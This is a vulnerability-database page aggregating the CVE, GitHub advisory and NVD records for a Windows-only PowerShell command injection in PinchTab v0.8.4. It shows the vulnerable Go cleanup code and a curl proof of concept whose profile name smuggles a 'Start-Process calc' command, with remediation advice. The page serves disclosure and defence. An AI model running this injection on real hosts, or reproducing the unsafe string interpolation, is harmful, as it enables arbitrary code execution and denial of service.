Vulnerability-Lookup

CVE-2026-33623 (GCVE-0-2026-33623)

Vulnerability from cvelistv5 – Published: 2026-03-26 20:47 – Updated: 2026-03-27 20:01

Title

PinchTab: OS Command Injection via Profile Name in Windows Cleanup Routine Enables Arbitrary Command Execution

Summary

PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue.

Severity ?

6.7 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-400 - Uncontrolled Resource Consumption

Assigner

GitHub_M

References

URL

Tags

	https://github.com/pinchtab/pinchtab/security/adv…	x_refsource_CONFIRM
	https://github.com/pinchtab/pinchtab/commit/25b33…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	pinchtab	pinchtab	Affected: < 0.8.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33623",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-27T19:51:23.671094Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-27T20:01:25.733Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "pinchtab",
          "vendor": "pinchtab",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.8.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-26T20:47:05.652Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh"
        },
        {
          "name": "https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd"
        }
      ],
      "source": {
        "advisory": "GHSA-p8mm-644p-phmh",
        "discovery": "UNKNOWN"
      },
      "title": "PinchTab: OS Command Injection via Profile Name in Windows Cleanup Routine Enables Arbitrary Command Execution"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33623",
    "datePublished": "2026-03-26T20:47:05.652Z",
    "dateReserved": "2026-03-23T14:24:11.617Z",
    "dateUpdated": "2026-03-27T20:01:25.733Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33623\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-26T21:17:06.950\",\"lastModified\":\"2026-03-31T16:03:21.250\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue.\"},{\"lang\":\"es\",\"value\":\"PinchTab es un servidor HTTP aut\u00f3nomo que otorga a los agentes de IA control directo sobre un navegador Chrome. PinchTab \u0027v0.8.4\u0027 contiene un problema de inyecci\u00f3n de comandos solo para Windows en la ruta de limpieza de Chrome hu\u00e9rfano. Cuando una instancia se detiene, la rutina de limpieza de Windows construye una cadena de PowerShell \u0027-Command\u0027 usando una \u0027needle\u0027 derivada de la ruta del perfil. En \u0027v0.8.4\u0027, esa interpolaci\u00f3n de cadena escapa las barras invertidas pero no neutraliza de forma segura otros metacaracteres de PowerShell. Si un atacante puede lanzar una instancia usando un nombre de perfil manipulado y luego activar la ruta de limpieza, podr\u00edan ejecutar comandos arbitrarios de PowerShell en el host de Windows en el contexto de seguridad del usuario del proceso de PinchTab. Esto no es una RCE de internet no autenticada. Requiere acceso a la API autenticado y equivalente a administrador a los puntos finales del ciclo de vida de la instancia, y la ejecuci\u00f3n de comandos resultante hereda los permisos del usuario del SO de PinchTab en lugar de eludir los l\u00edmites de privilegios del host. La versi\u00f3n 0.8.5 contiene un parche para el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L\",\"baseScore\":6.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":1.2,\"impactScore\":5.5},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"},{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.8.5\",\"matchCriteriaId\":\"9E159A6D-501A-450C-98AC-61DF18CF18F7\"}]}]}],\"references\":[{\"url\":\"https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33623\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-27T19:51:23.671094Z\"}}}], \"references\": [{\"url\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-27T19:51:34.295Z\"}}], \"cna\": {\"title\": \"PinchTab: OS Command Injection via Profile Name in Windows Cleanup Routine Enables Arbitrary Command Execution\", \"source\": {\"advisory\": \"GHSA-p8mm-644p-phmh\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"pinchtab\", \"product\": \"pinchtab\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.8.5\"}]}], \"references\": [{\"url\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh\", \"name\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd\", \"name\": \"https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-26T20:47:05.652Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33623\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-27T20:01:25.733Z\", \"dateReserved\": \"2026-03-23T14:24:11.617Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-26T20:47:05.652Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-P8MM-644P-PHMH

Vulnerability from github – Published: 2026-03-24 19:46 – Updated: 2026-03-27 21:19

Summary

PinchTab: OS Command Injection via Profile Name in Windows Cleanup Routine Enables Arbitrary Command Execution

Details

Summary

PinchTab v0.8.4 contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell -Command string using a needle derived from the profile path. In v0.8.4, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters.

If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user.

This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries.

Details

Issue 1 — PowerShell command string built with interpolated user-influenced data (internal/bridge/cleanup_windows.go in v0.8.4):

func findPIDsByPowerShell(needle string) []int {
    escaped := strings.ReplaceAll(needle, `\`, `\\`)
    cmd := exec.Command("powershell", "-NoProfile", "-Command",
        fmt.Sprintf(`Get-CimInstance Win32_Process -Filter "Name='chrome.exe'" | `+
            `Where-Object { $_.CommandLine -like '*%s*' } | `+
            `Select-Object -ExpandProperty ProcessId`, escaped))
}

The needle value is interpolated directly into a PowerShell command string. Escaping backslashes alone is not sufficient to make arbitrary user-controlled content safe inside a PowerShell expression.

Issue 2 — needle is derived from launchable profile names:

The cleanup path uses:

findPIDsByPowerShell(fmt.Sprintf("--user-data-dir=%s", profileDir))

The profile directory is derived from the instance/profile name used during launch. In v0.8.4, profile name validation rejected path traversal characters such as /, \, and .., but it did not comprehensively block PowerShell metacharacters such as single quotes or statement separators.

Issue 3 — Trigger path is reachable through normal instance lifecycle APIs:

The attack path described in the report uses:

POST /instances/launch with a crafted name
POST /instances/{id}/stop to trigger the cleanup routine

That means exploitability depends on access to privileged orchestration endpoints, not on local shell access.

PoC

Environment assumptions

PinchTab v0.8.4
Windows host
Valid API token with access to instance lifecycle endpoints

Example sequence

curl -X POST http://HOST:9867/instances/launch \
  -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "poc'\''; Start-Process calc; $x='\''",
    "mode": "headless"
  }'

Then:

curl -X POST http://HOST:9867/instances/<INSTANCE_ID>/stop \
  -H "Authorization: Bearer <TOKEN>"

If the payload survives the launch path and reaches the vulnerable cleanup code, the injected PowerShell executes when the Windows cleanup routine runs.

Impact

Arbitrary PowerShell command execution on Windows as the PinchTab process user.
Full compromise of data and processes accessible to that user account.
Possible persistence or host-level follow-on actions within the same user security context.
Potential repeated execution in restart-heavy environments if the vulnerable cleanup path is triggered repeatedly.

Scope And Limits

Windows only.
Requires authenticated, administrative-equivalent API access to instance lifecycle endpoints.
Does not by itself elevate beyond the privileges of the Windows user running PinchTab.
This is stronger than a policy bypass or low-risk hardening gap, but narrower than unauthenticated remote code execution.

Suggested Remediation

Do not interpolate user-influenced values into PowerShell -Command strings.
Pass search terms through environment variables or structured arguments instead of code generation.
Keep strict validation on profile names, but do not rely on input validation alone as the primary defense.
Add regression tests covering PowerShell metacharacters in profile-derived values on Windows.

Steps to Reproduce:

Environment Setup: Target: PinchTab v0.8.4 (Windows build) Platform: Windows only

1. Launch Instance with Malicious Profile Name

curl -X POST http://[server-ip]:9867/instances/launch \
  -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "poc'\''; Start-Process calc; $x='\''",
    "mode": "headless"
  }'

2. Stop Instance to Trigger Injection

curl -X POST http://[server-ip]:9867/instances/<INSTANCE_ID>/stop \
  -H "Authorization: Bearer <TOKEN>"

Additional Observation — Repeated Execution (DoS Amplification)

In environments where instances are automatically restarted (e.g., always-on mode), the cleanup routine is triggered repeatedly.

Because the injection occurs during cleanup, the payload is executed on every restart cycle: Continuous spawning of calc.exe processes Resource exhaustion System instability or crash

Impact

This vulnerability allows an authenticated attacker to execute arbitrary PowerShell commands on the Windows host running PinchTab. Impact - full host compromise including command execution, persistence, and data access; Root Cause - user-controlled input (profile name) is embedded into a PowerShell command without proper neutralization of special characters; Remediation - avoid constructing shell commands using string interpolation, enforce strict input validation (allowlist), and use structured command execution instead of powershell -Command.

Additionally, because the injection is triggered during the cleanup routine, environments with automatic instance restart behavior may repeatedly execute the injected payload, leading to uncontrolled process creation and resource exhaustion. This enables a reliable denial-of-service condition in addition to remote code execution.

Severity ?

6.7 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.4"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/pinchtab/pinchtab/cmd/pinchtab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/pinchtab/pinchtab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33623"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T19:46:39Z",
    "nvd_published_at": "2026-03-26T21:17:06Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nPinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters.\n\nIf an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user.\n\nThis is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries.\n\n### Details\n**Issue 1 \u2014 PowerShell command string built with interpolated user-influenced data (`internal/bridge/cleanup_windows.go` in `v0.8.4`):**\n\n```\nfunc findPIDsByPowerShell(needle string) []int {\n    escaped := strings.ReplaceAll(needle, `\\`, `\\\\`)\n    cmd := exec.Command(\"powershell\", \"-NoProfile\", \"-Command\",\n        fmt.Sprintf(`Get-CimInstance Win32_Process -Filter \"Name=\u0027chrome.exe\u0027\" | `+\n            `Where-Object { $_.CommandLine -like \u0027*%s*\u0027 } | `+\n            `Select-Object -ExpandProperty ProcessId`, escaped))\n}\n```\n\nThe `needle` value is interpolated directly into a PowerShell command string. Escaping backslashes alone is not sufficient to make arbitrary user-controlled content safe inside a PowerShell expression.\n\n**Issue 2 \u2014 `needle` is derived from launchable profile names:**\n\nThe cleanup path uses:\n\n```\nfindPIDsByPowerShell(fmt.Sprintf(\"--user-data-dir=%s\", profileDir))\n```\n\nThe profile directory is derived from the instance/profile name used during launch. In `v0.8.4`, profile name validation rejected path traversal characters such as `/`, `\\`, and `..`, but it did not comprehensively block PowerShell metacharacters such as single quotes or statement separators.\n\n**Issue 3 \u2014 Trigger path is reachable through normal instance lifecycle APIs:**\n\nThe attack path described in the report uses:\n\n1. `POST /instances/launch` with a crafted `name`\n2. `POST /instances/{id}/stop` to trigger the cleanup routine\n\nThat means exploitability depends on access to privileged orchestration endpoints, not on local shell access.\n\n### PoC\n**Environment assumptions**\n\n- PinchTab `v0.8.4`\n- Windows host\n- Valid API token with access to instance lifecycle endpoints\n\n**Example sequence**\n\n```bash\ncurl -X POST http://HOST:9867/instances/launch \\\n  -H \"Authorization: Bearer \u003cTOKEN\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"name\": \"poc\u0027\\\u0027\u0027; Start-Process calc; $x=\u0027\\\u0027\u0027\",\n    \"mode\": \"headless\"\n  }\u0027\n```\n\nThen:\n\n```bash\ncurl -X POST http://HOST:9867/instances/\u003cINSTANCE_ID\u003e/stop \\\n  -H \"Authorization: Bearer \u003cTOKEN\u003e\"\n```\n\nIf the payload survives the launch path and reaches the vulnerable cleanup code, the injected PowerShell executes when the Windows cleanup routine runs.\n\n### Impact\n1. Arbitrary PowerShell command execution on Windows as the PinchTab process user.\n2. Full compromise of data and processes accessible to that user account.\n3. Possible persistence or host-level follow-on actions within the same user security context.\n4. Potential repeated execution in restart-heavy environments if the vulnerable cleanup path is triggered repeatedly.\n\n### Scope And Limits\n1. Windows only.\n2. Requires authenticated, administrative-equivalent API access to instance lifecycle endpoints.\n3. Does not by itself elevate beyond the privileges of the Windows user running PinchTab.\n4. This is stronger than a policy bypass or low-risk hardening gap, but narrower than unauthenticated remote code execution.\n\n### Suggested Remediation\n1. Do not interpolate user-influenced values into PowerShell `-Command` strings.\n2. Pass search terms through environment variables or structured arguments instead of code generation.\n3. Keep strict validation on profile names, but do not rely on input validation alone as the primary defense.\n4. Add regression tests covering PowerShell metacharacters in profile-derived values on Windows.\n\n\n\n\n### **Steps to Reproduce:**\n\n**Environment Setup:**\nTarget: PinchTab v0.8.4 (Windows build)\nPlatform: Windows only\n\n**1. Launch Instance with Malicious Profile Name**\n\n```\ncurl -X POST http://[server-ip]:9867/instances/launch \\\n  -H \"Authorization: Bearer \u003cTOKEN\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"name\": \"poc\u0027\\\u0027\u0027; Start-Process calc; $x=\u0027\\\u0027\u0027\",\n    \"mode\": \"headless\"\n  }\u0027\n```\n\n**2. Stop Instance to Trigger Injection**\n\n```\ncurl -X POST http://[server-ip]:9867/instances/\u003cINSTANCE_ID\u003e/stop \\\n  -H \"Authorization: Bearer \u003cTOKEN\u003e\"\n```\n\n### **Additional Observation \u2014 Repeated Execution (DoS Amplification)**\n\n**In environments where instances are automatically restarted (e.g., always-on mode), the cleanup routine is triggered repeatedly.**\n\nBecause the injection occurs during cleanup, the payload is executed on every restart cycle:\nContinuous spawning of calc.exe processes\nResource exhaustion\nSystem instability or crash\n\n### **Impact**\n\nThis vulnerability allows an authenticated attacker to execute arbitrary PowerShell commands on the Windows host running PinchTab. Impact - full host compromise including command execution, persistence, and data access; Root Cause - user-controlled input (profile name) is embedded into a PowerShell command without proper neutralization of special characters; Remediation - avoid constructing shell commands using string interpolation, enforce strict input validation (allowlist), and use structured command execution instead of powershell -Command.\n\nAdditionally, because the injection is triggered during the cleanup routine, environments with automatic instance restart behavior may repeatedly execute the injected payload, leading to uncontrolled process creation and resource exhaustion. This enables a reliable denial-of-service condition in addition to remote code execution.",
  "id": "GHSA-p8mm-644p-phmh",
  "modified": "2026-03-27T21:19:09Z",
  "published": "2026-03-24T19:46:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33623"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pinchtab/pinchtab"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PinchTab: OS Command Injection via Profile Name in Windows Cleanup Routine Enables Arbitrary Command Execution"
}

FKIE_CVE-2026-33623

Vulnerability from fkie_nvd - Published: 2026-03-26 21:17 - Updated: 2026-03-31 16:03

Severity ?

6.7 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd	Patch
security-advisories@github.com	https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	pinchtab	pinchtab	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E159A6D-501A-450C-98AC-61DF18CF18F7",
              "versionEndExcluding": "0.8.5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue."
    },
    {
      "lang": "es",
      "value": "PinchTab es un servidor HTTP aut\u00f3nomo que otorga a los agentes de IA control directo sobre un navegador Chrome. PinchTab \u0027v0.8.4\u0027 contiene un problema de inyecci\u00f3n de comandos solo para Windows en la ruta de limpieza de Chrome hu\u00e9rfano. Cuando una instancia se detiene, la rutina de limpieza de Windows construye una cadena de PowerShell \u0027-Command\u0027 usando una \u0027needle\u0027 derivada de la ruta del perfil. En \u0027v0.8.4\u0027, esa interpolaci\u00f3n de cadena escapa las barras invertidas pero no neutraliza de forma segura otros metacaracteres de PowerShell. Si un atacante puede lanzar una instancia usando un nombre de perfil manipulado y luego activar la ruta de limpieza, podr\u00edan ejecutar comandos arbitrarios de PowerShell en el host de Windows en el contexto de seguridad del usuario del proceso de PinchTab. Esto no es una RCE de internet no autenticada. Requiere acceso a la API autenticado y equivalente a administrador a los puntos finales del ciclo de vida de la instancia, y la ejecuci\u00f3n de comandos resultante hereda los permisos del usuario del SO de PinchTab en lugar de eludir los l\u00edmites de privilegios del host. La versi\u00f3n 0.8.5 contiene un parche para el problema."
    }
  ],
  "id": "CVE-2026-33623",
  "lastModified": "2026-03-31T16:03:21.250",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.7,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
